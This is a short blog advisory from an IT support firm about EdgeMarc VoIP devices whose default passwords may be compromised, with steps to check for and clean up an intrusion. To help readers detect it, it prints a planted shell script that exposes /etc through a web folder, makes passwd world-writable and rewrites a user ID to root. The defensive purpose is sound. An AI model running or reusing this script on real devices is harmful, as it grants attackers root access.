Give us a call

Ferrum Technology Services Blog

Ferrum Technology Services has been serving the Elgin area since 2007, providing IT Support such as technical helpdesk support, computer support, and consulting to small and medium-sized businesses.

IMPORTANT: EdgeMarc Device Passwords Potentially Compromised

edgemarc-password-vulnerabilityOur partner, Bandwidth, has discovered an issue wherein EdgeMarc device default passwords may have been compromised on the internet.

Any customer who currently owns the EdgeMarc box should immediately change their password.

If you are unsure if your specific device has been compromised, you can take the following steps to investigate.  However, it is still highly recommended to change the password:

  • In the EdgeMarc GUI, under 'System' click on "Client List".  If there are any entries listed other than known and local IP addresses, there is a strong possibility that your device has been compromised.  To resolve, remove the offending IP address.

Additionally, the following steps should be taken to to ensure a secure device:

  • Disable PPTP (Point-to-Point Protocol) - Under PPTP server > Username, ensure there is no user built unless it is a known user.
  • Disallow WAN clients - Under VoIP ALG, uncheck both the 'allow clients on WAN' option, as well as the 'Enable LLDP' option.
  • Verify no additional scripting has taken place, by looking under 'User Commands'.  Specifically, if the following script is present, it will need to be deleted:

ln -sf /etc /etc/images/m.txt
chmod 777 /etc/images/m.txt/config/passwd
sed -i -e s'_'"501"'_'"0"'_' /etc/images/m.txt/config/passwd
sed -i -e s'_'"501"'_'"0"'_' /etc/images/m.txt/config/passwd
sed -i -e s'_'"/etc/images"'_'"/"'_' /etc/images/m.txt/config/passwd

Note:  Some EdgeMarc screens within the GUI save changes while you're making them, and others require you to hit a 'submit' button. Please take note of this while making your changes.

If assistance is needed in making this important password change, or if you have questions regarding this notice, please reach out to the Ferrum Technology Services team at (847) 697-3282 for assistance.

Maintaining a SwitchVox Cold Spare
VoIP and Voice: What You Need To Know
 

Comments

No comments made yet. Be the first to submit a comment
Guest
Already Registered? Login Here
Guest
Monday, 06 May 2024

Captcha Image

Blog Archive

2024
June
July
August
September
October
November
December
2012
January
February
March
April
May
June
July
August
September
October
November
December
2011
January
February
March
April
May
June
July
August
September
October
November
December
2010
January
February
March
April
May
June
July
August
September
October
November
December
2009
January
February
March
April
May
June
July
August
September
October
November
December
2008
January
February
March
April
May
June
July
August
September
October
November
December
2007
January
February
March
April
May
June
July
August
September
October
November
December

Mobile? Grab this Article

QR Code